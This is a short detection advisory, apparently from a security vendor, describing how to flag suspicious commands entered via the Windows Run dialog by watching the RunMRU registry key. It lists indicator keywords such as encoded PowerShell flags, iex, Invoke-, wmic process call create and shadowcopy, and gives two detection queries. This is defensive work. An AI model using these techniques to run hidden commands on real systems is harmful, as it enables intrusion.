Date: 11/04/2024
Severity: Medium
Summary
The "Potentially Suspicious Command Executed Via Run Dialog Box - Registry" refers to a security alert indicating that a command deemed potentially harmful was executed using the Run dialog in Windows. This feature allows users to quickly launch applications or commands. If an unusual or unexpected command is run, it may signal malware activity or unauthorized access. Monitoring the Windows Registry for such entries can help identify and respond to potential security threats. Security tools may flag these events to assist in investigating and mitigating risks.
Indicators of Compromise (IOC) List
TargetObject | '\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' |
Details | 'powershell' 'pwsh' ' -e ' ' -ec ' ' -en ' ' -enc ' ' -enco' 'ftp' 'Hidden' 'http' 'iex' 'Invoke-' 'wmic' 'shadowcopy' 'process call create' |
Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection
Detection Query 1 | resourcename in ("Sysmon") AND eventtype = "13" AND targetObject = "\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" AND (details in ("powershell","pwsh","-e","-ec","-en","-enc","-enco","ftp","Hidden","http","iex","Invoke-") OR details in ("wmic","shadowcopy","process call create")) |
Detection Query 2 | Technologygroup = "EDR" AND targetObject = "\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" AND (details in ("powershell","pwsh","-e","-ec","-en","-enc","-enco","ftp","Hidden","http","iex","Invoke-") OR details in ("wmic","shadowcopy","process call create")) |
Reference:
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_set/registry_set_runmru_susp_command_execution.yml